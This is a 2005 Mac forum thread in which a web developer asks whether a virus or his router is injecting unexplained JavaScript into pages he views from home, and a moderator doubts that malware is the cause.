Do I have a real virus? Oh geezus...

Discussion in 'General Mac Discussion' started by jvaska, Mar 4, 2005.

1. macrumors 6502

Years ago there was a famous virus that had something to do with http://padonack.info...

When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?

2. Moderator emeritus

Mitthrawnuruodo

I'm sorry, but have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever) then JavaScripts does not insert it self into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...

3. thread starter macrumors 6502

Sorry, I'm freaking out herre...

I'm on OSX 10.3.7 using Safari 1.2.4...

My Apache is not configured to add anything. My AdBlock has never posed any problems of any sort...

My webshost claims it's me...and from what I can determine, the problem is coming my end of things (since others are not experiencing the problem while visiting my site).

Is it possible that the router could be doing this? I don't know much about them...